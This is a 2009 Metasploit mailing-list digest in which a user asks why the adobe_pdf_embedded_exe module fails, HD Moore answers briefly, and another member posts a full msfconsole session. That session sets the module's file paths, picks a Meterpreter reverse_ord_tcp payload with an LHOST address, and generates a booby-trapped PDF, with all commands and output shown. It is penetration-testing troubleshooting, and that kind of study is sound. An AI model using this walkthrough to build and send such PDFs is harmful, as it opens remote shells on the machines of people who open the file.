Metasploit mailing list archives
Framework Digest, Vol 20, Issue 25
From: mr.r.birtles at gmail.com (ricky-lee birtles)
Date: Sun, 27 Sep 2009 11:04:04 +0100
moshe, Have a look through the following genaration of a pdf with the exploit you are looking at and see if there is anything you have missed. Hopefully this will help. usr at endure /msf3 $ ./msfconsole *** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break! *** Please report bugs to msfdev[at]metasploit.com | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ msf v3.3-dev [core:3.3 api:1.0] + -- --=[ 405 exploits - 260 payloads + -- --=[ 21 encoders - 8 nops =[ 189 aux msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME msf.pdf no The Input PDF filename. OUTPUTPATH ./data/exploits/ no The location to output the file. Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe) > set EXENAME out.exe EXENAME => out.exe msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/373.pdf INFILENAME => /tmp/373.pdf msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/ OUTPUTPATH => /tmp/ msf exploit(adobe_pdf_embedded_exe) > set FILENAME msf_file.pdf FILENAME => msf_file.pdf msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_ord_tcp PAYLOAD => windows/meterpreter/reverse_ord_tcp msf exploit(adobe_pdf_embedded_exe) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME out.exe no The Name of payload exe. FILENAME msf_file.pdf no The output filename. INFILENAME /tmp/373.pdf no The Input PDF filename. OUTPUTPATH /tmp/ no The location to output the file. Payload options (windows/meterpreter/reverse_ord_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.10.101 LHOST => 192.168.10.101 msf exploit(adobe_pdf_embedded_exe) > exploit [*] Started reverse handler [*] Reading in '/tmp/373.pdf'... [*] Parseing '/tmp/373.pdf'... [*] Parseing Successfull. [*] Using 'out.exe' as payload... [*] Creating 'msf_file.pdf' file... [*] Generated output file /tmp/msf_file.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_pdf_embedded_exe) > -- Mr R Birtles 2009/9/27 Moshe Ben Simon <moshe at injection.co.il>:
Hi HD I look over the " adobe_pdf_embedded_exe" ruby script and find the variable INFILENAME, EXENAME, FILENAME,OUTPUTPATH but when I try to use them I get again the error... Can somebody help me on the syntax.... Help....:) Moshe -----Original Message----- From: framework-bounces at spool.metasploit.com [mailto:framework-bounces at spool.metasploit.com] On Behalf Of framework-request at spool.metasploit.com Sent: Saturday, September 26, 2009 9:00 PM To: framework at spool.metasploit.com Subject: Framework Digest, Vol 20, Issue 25 Send Framework mailing list submissions to ? ? ? ?framework at spool.metasploit.com To subscribe or unsubscribe via the World Wide Web, visit ? ? ? ?https://mail.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to ? ? ? ?framework-request at spool.metasploit.com You can reach the person managing the list at ? ? ? ?framework-owner at spool.metasploit.com When replying, please edit your Subject line so it is more specific than "Re: Contents of Framework digest..." Today's Topics: ? 1. adobe_pdf_embedded_exe (Moshe Ben Simon) ? 2. adobe_pdf_embedded_exe (Moshe Ben Simon) ? 3. Re: adobe_pdf_embedded_exe (Jerome Athias) ? 4. Re: adobe_pdf_embedded_exe (HD Moore) ---------------------------------------------------------------------- Message: 1 Date: Sat, 26 Sep 2009 16:01:17 +0300 (IDT) From: "Moshe Ben Simon" <moshe at injection.co.il> To: framework at spool.metasploit.com Subject: [framework] adobe_pdf_embedded_exe Message-ID: ? ? ? ?<77fe340193a0c1c3972792e3adb68e33.squirrel at mail.injection.co.il> Content-Type: text/plain;charset=iso-8859-1 I read the article on pdf with meterpreter and test your "adobe_pdf_embedded_exe". I get all the time the same error: "Exploit failed: No such file or directory - msf.pdf" Do you know why?? I have pdf file called msf.pdf in the directory /data/exploit under framewaork3 ------------------------------ Message: 2 Date: Sat, 26 Sep 2009 15:42:29 +0200 From: "Moshe Ben Simon" <moshe at injection.co.il> To: <framework at spool.metasploit.com> Subject: [framework] adobe_pdf_embedded_exe Message-ID: <20090926131230.4BC20307D6 at slug.metasploit.com> Content-Type: text/plain; charset="us-ascii" I read the article on pdf with meterpreter and test your "adobe_pdf_embedded_exe". I get all the time the same error: "Exploit failed: No such file or directory - msf.pdf" Do you know why.? I have pdf file called msf.pdf in the directory /data/exploit under framewaork3 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090926/f2701fc c/attachment-0001.html> ------------------------------ Message: 3 Date: Sat, 26 Sep 2009 16:21:37 +0200 From: Jerome Athias <jerome.athias at free.fr> To: moshe at injection.co.il Cc: framework at spool.metasploit.com Subject: Re: [framework] adobe_pdf_embedded_exe Message-ID: <1253974897.4336.3.camel at acer> Content-Type: text/plain Heya, you should learn more about this here: http://www.stoned-vienna.com Good luck /JA ------------------------------ Message: 4 Date: Sat, 26 Sep 2009 09:34:33 -0500 From: HD Moore <hdm at metasploit.com> To: framework at spool.metasploit.com Subject: Re: [framework] adobe_pdf_embedded_exe Message-ID: <1253975673.4181.43.camel at localhost> Content-Type: text/plain; charset="UTF-8" On Sat, 2009-09-26 at 15:42 +0200, Moshe Ben Simon wrote:I read the article on pdf with meterpreter and test your "adobe_pdf_embedded_exe". I get all the time the same error: "Exploit failed: No such file or directory - msf.pdf" Do you know why??You have to specify the full path for the input file, and the output directory, and output file name for the created PDF -HD ------------------------------ _______________________________________________ Framework mailing list Framework at spool.metasploit.com https://mail.metasploit.com/mailman/listinfo/framework End of Framework Digest, Vol 20, Issue 25 ***************************************** _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Framework Digest, Vol 20, Issue 25 Moshe Ben Simon (Sep 27)
- Framework Digest, Vol 20, Issue 25 ricky-lee birtles (Sep 27)